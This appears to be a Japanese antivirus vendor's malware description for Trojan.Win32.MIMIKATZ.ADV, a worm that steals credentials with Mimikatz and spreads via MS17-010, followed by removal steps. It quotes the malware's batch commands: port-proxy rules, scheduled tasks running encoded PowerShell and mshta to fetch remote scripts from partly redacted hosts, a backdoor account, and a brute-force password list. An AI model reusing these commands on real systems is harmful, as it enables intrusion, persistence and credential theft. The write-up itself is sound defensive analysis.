Trojan.Win32.MIMIKATZ.ADV
Trojan:Win32/CryptInject(MICROSOFT); Trojan.Win32.Trickster.dmp(KASPERSKY); Python/Agent.DU!tr(FORTINET);
Windows
マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
はい
感染報告の有無 :
はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
マルウェアは、バックドア活動の機能を備えていません。
マルウェアは、特定の脆弱性を利用した感染活動を実行します。 ただし、情報公開日現在、このWebサイトにはアクセスできません。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- %Temp%\mkatz.ini → Mimikatz script output
- %User Temp%\_MEI{random}\{Python components}
(註:%Temp%フォルダは、一時的にファイルが保存されるフォルダで、いずれのオペレーティングシステム(OS)でも通常、 "C:\Windows\Temp" です。.. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)
マルウェアは、以下のファイルを作成し実行します。
- %Temp%\m.ps1 → obfuscated Mimikatz PowerShell script, detected as Trojan.PS1.MIMIKATZ.ADS
マルウェアは、以下のプロセスを追加します。
- netsh advfirewall set allprofile state on
- netsh advfirewall firewall add rule name=denyy445 dir=in action=block protocol=TCP localport=445
- netsh firewall add portopening tcp 65532 DNS2
- netsh interface portproxy add v4tov4 listenport=65532 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- netsh firewall add portopening tcp 65531 DNSS2
- netsh interface portproxy add v4tov4 listenport=65531 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
マルウェアは、以下のフォルダを作成します。
- %User Temp%\_MEI{random}
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)
バックドア活動
マルウェアは、バックドア活動の機能を備えていません。
ルートキット機能
マルウェアは、ルートキット機能を備えていません。
情報漏えい
マルウェアは、以下の情報を収集します。
- Computer Name
- Public IP Address
- Username
- Password
その他
マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。
- http://{BLOCKED}.{BLOCKED}.pl/raw
- http://{BLOCKED}p.com
マルウェアは、以下を実行します。
- It connects to the following website(s) to download and execute a script:
- http://v.{BLOCKED}h.com/v{user domain}
- http://w.{BLOCKED}h.com/page.html?p{computer name}
- Port 60124 serves as its mutex to allow only one instance running.
- It deletes the user "k8h3d" if it exists, then it creates the same username afterwards on the infected machine and the vulnerable target machine.
- It scans randomly-generated IP addresses over the Internet and the local network to check for open port 445.
If it finds a target with an open port 445, it will attempt to exploit MS17-010 vulnerability and perform the following commands:- Send one of the following files to the target and saved as %System Root%\installed.exe and %System Root%\installed2.exe:
- %Windows%\System32\svhost.exe
- %Windows%\SysWOW64\svhost.exe
- %Windows%\System32\drivers\svchost.exe
- %Windows%\SysWOW64\drivers\svchost.exe
- Copy %Temp%\svchost.exe as %Windows%\{random 4-8 letters}.exe
- Move %Temp%\dig.exe as %Windows%\{random 4-8 letters}.exe
- Create a batch file named %Temp%\p.bat containing the ff. commands:
- move /y %Temp%\{Random 4-8 letters}.exe %Windows%
- netsh interface ipv6 install
- netsh firewall add portopening tcp 65532 DNS2
- netsh interface portproxy add v4tov4 listenport=65532 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- netsh firewall add portopening tcp 65531 DNSS2
- netsh interface portproxy add v4tov4 listenport=65531 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e {base-64 string}" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random 4-8 letters}" /tr "%Windows%\{random 4-8 letters}.exe" /F&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%Temp%\svchost.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"&schtasks /run /TN Autocheck&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "%Windows%\{random 4-8 letters}.exe"&schtasks /run /TN Autostart&schtasks /delete /TN Autoscan /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autoscan /tr "%Temp%\svchost.exe"&schtasks /run /TN Autoscan)
- net start Ddriver
- for /f %%i in (\'tasklist | find /c /i "cmd.exe"\') do set s=%%i
- if %s% gtr 10 (shutdown /r)
- net user k8h3d /del
- %Temp%\svchost.exe
- del %Temp%\p.bat
- Copies %Temp%\updll.exe and %Temp%\upinstalled.exe to the target machine, saved as the same filenames. It then creates %Temp%\tmp.vbs which executes the copied files.
- Attempt to execute the sent files on the target machine.
- Send one of the following files to the target and saved as %System Root%\installed.exe and %System Root%\installed2.exe:
マルウェアは、以下の脆弱性を利用して感染活動を実行します。
ただし、情報公開日現在、このWebサイトにはアクセスできません。
以下のスケジュールされたタスクを追加します:
- Task Name: DnsScan
Task to be Run: %Temp%\svchost.exe - Task Name: \Microsoft\windows\Bluetooths
Task to be Run: powershell -ep bypass -e {base-64 string} → downloads and executes http://v.{BLOCKED}h.com/v{user domain} - Task Name: Autocheck
Task to be Run: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%" - Task Name: Autoscan
Task to be Run: %Temp%\svchost.exe
注意:
マルウェアは、以下のユーザ名とパスワードを使用して、ターゲットコンピュータへのログインを試みます。
- ユーザ名:
- Administrator
- user
- admin
- test
- hp
- guest
- k8h3d
- パスワード:
- 123456
- password
- qwerty
- 12345678
- 123456789
- 123
- 1234
- 123123
- 12345
- 12345678
- 123123123
- 1234567890
- 88888888
- 111111111
- 0
- 111111
- 112233
- 123321
- 654321
- 666666
- 888888
- a123456
- 123456a
- 5201314
- 1qaz2wsx
- 1q2w3e4r
- qwe123
- 123qwe
- a123456789
- 123456789a
- baseball
- dragon
- football
- iloveyou
- password
- sunshine
- princess
- welcome
- abc123
- monkey
- !@#$%^&*
- charlie
- aa123456
- Aa123456
- admin
- homelesspa
- password1
- 1q2w3e4r5t
- qwertyuiop
- 1qaz2wsx
- ターゲットのIPアドレス:
- {BLOCKED}.{BLOCKED}.0.1/24
- {BLOCKED}.{BLOCKED}.1.1/24
- {BLOCKED}.{BLOCKED}.2.1/24
- {BLOCKED}.{BLOCKED}.3.1/24
- {BLOCKED}.{BLOCKED}.4.1/24
- {BLOCKED}.{BLOCKED}.5.1/24
- {BLOCKED}.{BLOCKED}.6.1/24
- {BLOCKED}.{BLOCKED}.7.1/24
- {BLOCKED}.{BLOCKED}.8.1/24
- {BLOCKED}.{BLOCKED}.9.1/24
- {BLOCKED}.{BLOCKED}.10.1/24
- {BLOCKED}.{BLOCKED}.18.1/24
- {BLOCKED}.{BLOCKED}.31.1/24
- {BLOCKED}.{BLOCKED}.199.1/24
- {BLOCKED}.{BLOCKED}.254.1/24
- {BLOCKED}.{BLOCKED}.67.1/24
- {BLOCKED}.{BLOCKED}.0.1/24
- {BLOCKED}.{BLOCKED}.1.1/24
- {BLOCKED}.{BLOCKED}.2.1/24
- {BLOCKED}.{BLOCKED}.1.1/24
- {BLOCKED}.{BLOCKED}.90.1/24
- {BLOCKED}.{BLOCKED}.10.1/24
- {BLOCKED}.{BLOCKED}.1.1/24
ユーザ名、パスワード、IPアドレスは、上記のリストに限定されたものではありません。ファイル %Temp%\mkatz.ini は、ドメイン、ユーザ名、およびパスワードを取得するために解析されます。これらは、ターゲットコンピュータへのログイン試行にも使用されます。
一部のコマンドが実行されるためには、情報作成時現在 HackTool.Win32.Radmin.GBとして検出されるコンポーネントが必要です。 このコンポーネントは、 ターゲットコンピュータの %Windows%ディレクトリ内に、{ランダムな8文字}.exe として作成される可能性があります。
また、以下のレジストリキーとエントリをターゲットコンピュータ上に作成します。そして、上記のコンポーネントファイルとコマンドを実行します。
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\{ランダムな4文字} DisplayName = {ランダムな4文字} ImagePath = can be %Windows%\{ランダムな8文字}.exe、または {コマンド文字列}
コンポーネントファイルとサービスは、実行後に削除される可能性があります。
<補足>
インストール
マルウェアは、以下のファイルを作成します。
- %Temp%\mkatz.ini → Mimikatzスクリプトの出力
- %User Temp%\_MEI{ランダム}\{Pythonのコンポーネント}
マルウェアは、以下のファイルを作成し実行します。
- %Temp%\m.ps1 → 難読化されたMimikatz のパワーシェルスクリプト。Trojan.PS1.MIMIKATZ.ADSとして検出される
マルウェアは、以下のフォルダを作成します。
- %User Temp%\_MEI{ランダム}
情報漏えい
マルウェアは、以下の情報を収集します。
- コンピュータ名
- パブリックIPアドレス
- ユーザ名
- パスワード
その他
マルウェアは、以下を実行します。
- マルウェアは、以下のWebサイトに接続して、スクリプトをダウンロードして実行します。
- http://v.{BLOCKED}h.com/v{ユーザドメイン}
- http://w.{BLOCKED}h.com/page.html?p{コンピュータ名}
- ポート60124は、Mutexとして機能し、1つのインスタンスのみが実行されます。
- ユーザ"k8h3d"が存在する場合、削除します。その後、感染コンピュータおよび脆弱性が存在するターゲットのコンピュータに同じユーザ名を作成します。
- インターネットとローカルネットワーク上に開放されているポート445を、無作為に生成したIPアドレスで検索します。
開放されているポート445のターゲットを見つけると、MS17-010の脆弱性を利用し、以下のコマンドを実行します。- 以下のファイルのいずれかをターゲットに送信し、%System Root%\ installed.exe、および %System Root%\ installed2.exe として保存する
- %Windows%\System32\svhost.exe
- %Windows%\SysWOW64\svhost.exe
- %Windows%\System32\drivers\svchost.exe
- %Windows%\SysWOW64\drivers\svchost.exe
- %Temp%\ svchost.exe を %Windows%\{ランダムな4~8文字}.exe としてコピーする
- %Temp%\ dig.exe を %Windows%\ {ランダムな4〜8文字}.exe として移動する
- 以下のff. コマンドが含まれる %Temp%\ p.bat という名前のバッチファイルを作成する
- move /y %Temp%\{ランダムな4〜8文字}.exe %Windows%
- netsh interface ipv6 install
- netsh firewall add portopening tcp 65532 DNS2
- netsh interface portproxy add v4tov4 listenport=65532 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- netsh firewall add portopening tcp 65531 DNSS2
- netsh interface portproxy add v4tov4 listenport=65531 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e {base64文字列}" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{ランダムな4~8文字}" /tr "%Windows%\{ランダムな4~8文字}.exe" /F&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%Temp%\svchost.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"&schtasks /run /TN Autocheck&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "%Windows%\{ランダムな4~8文字}.exe"&schtasks /run /TN Autostart&schtasks /delete /TN Autoscan /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autoscan /tr "%Temp%\svchost.exe"&schtasks /run /TN Autoscan)
- net start Ddriver
- for /f %%i in (\'tasklist | find /c /i "cmd.exe"\') do set s=%%i
- if %s% gtr 10 (shutdown /r)
- net user k8h3d /del
- %Temp%\svchost.exe
- del %Temp%\p.bat
- %Temp%\updll.exe および %Temp%\upinstalled.ex をターゲットコンピュータにコピーし、同じファイル名で保存します。その後、%Temp%\tmp.vbs を作成してコピーしたファイルを実行する
- ターゲットマシン上で、送信したファイルの実行を試行する
マルウェアは、以下の脆弱性を利用して感染活動を実行します。
以下のスケジュールされたタスクを追加します:
- タスク名: DnsScan
実行するタスク: %Temp%\svchost.exe - タスク名: \Microsoft\windows\Bluetooths
実行するタスク: powershell -ep bypass -e {base-64 string} → downloads and executes http://v.{BLOCKED}h.com/v{user domain} - タスク名: Autocheck
実行するタスク: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%" - タスク名: Autoscan
実行するタスク: %Temp%\svchost.exe
- 以下のファイルのいずれかをターゲットに送信し、%System Root%\ installed.exe、および %System Root%\ installed2.exe として保存する
対応方法
手順 1
Windows XP、Windows Vista 、Windows 7、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
Windowsをセーフモードで再起動します。
手順 4
以下のファイルを検索し削除します。
- %Windows%\{random 4-8 letters}.exe
- %Temp%\mkatz.ini
- %Temp%\m.ps1
- %Temp%\upinstalled.exe
- %Temp%\updll.exe
- %Temp%\tmp.vbs
- %Temp%\p.bat
- %Temp%\dig.exe
- %Temp%\{Random 4-8 letters}.exe
- %System Root%\setupinstalled.exe
- %System Root%\install.exe
手順 5
以下のフォルダを検索し削除します。
- %User Temp%\_MEI{random}
手順 6
スケジュールされたタスクを削除する
タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。
- Task Name: DnsScan
- Task to be Run: %Temp%\svchost.exe
- Task Name: \Microsoft\windows\Bluetooths
- Task to be Run: powershell -ep bypass -e {base-64 string}
- Task Name: Autocheck
- Task to be Run: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
- Task Name: Autoscan
- Task to be Run: %Temp%\svchost.exe
Windows 2000、Windows XP、Windows Server 2003の場合:
- [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
- 上記の{タスク名} を、[名前]の欄に入力します。
- 入力した{タスク名} 持つファイルを右クリックします。
- [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
- 上記の{実行するタスク}と文字列が一致するタスクを削除します。
Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:
- Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。 - 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
- 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
- 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
- 文字列が一致するタスクを削除します。
手順 7
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Trojan.Win32.MIMIKATZ.ADV」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 8
以下の修正パッチをダウンロードし適用します。この脆弱性に対する修正パッチを適用するまで、該当製品の使用をお控えください。この製品の製造元が公開する正式な修正パッチをダウンロードし適用することをお勧めします。 Microsoft Security Bulletin MS17-010
手順 9
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Win32.MIMIKATZ.ADV」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください